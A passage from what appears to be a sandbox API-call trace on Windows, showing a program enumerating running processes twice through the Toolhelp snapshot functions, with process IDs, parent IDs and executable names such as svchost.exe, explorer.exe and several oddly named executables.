| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.383] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.398] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.406] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.448] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.449] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 
[0106.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.453] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.457] CloseHandle (hObject=0xc4) returned 1 [0106.457] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0106.461] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.476] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.479] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.490] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.491] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.493] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.494] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.495] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.496] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.497] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.498] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.499] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.500] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.502] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.503] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 